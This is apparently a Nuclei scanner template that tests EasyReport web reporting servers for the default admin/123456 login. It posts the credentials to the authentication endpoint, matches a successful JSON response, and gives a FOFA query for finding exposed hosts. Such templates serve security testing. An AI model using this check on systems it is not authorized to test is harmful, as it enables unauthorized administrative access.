id: easyreport-default-login
info:
name: EasyReport - Default Login
author: SleepingBag945
severity: high
classification:
cwe-id: CWE-798
metadata:
verified: true
max-request: 1
fofa-query: body="EasyReport-A Sample and Easy to Use Web Reporting System"
tags: easyreport,default-login,vuln
http:
- raw:
- |
POST /member/authenticate HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
account={{username}}&password={{password}}&rememberMe=false
attack: pitchfork
payloads:
username:
- admin
password:
- 123456
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"code":'
- '"detailMsg":'
- '"data":true'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a00463044022041104e7956589ecdba959983f3c7320ef45cd2aa30abf7be561f256e872ceb1c0220284bb65d24c2539088264f53cd58ab2855950d7a6b10f80954b1e83d3b8bde25:922c64590222798bb761d5b6d8e72950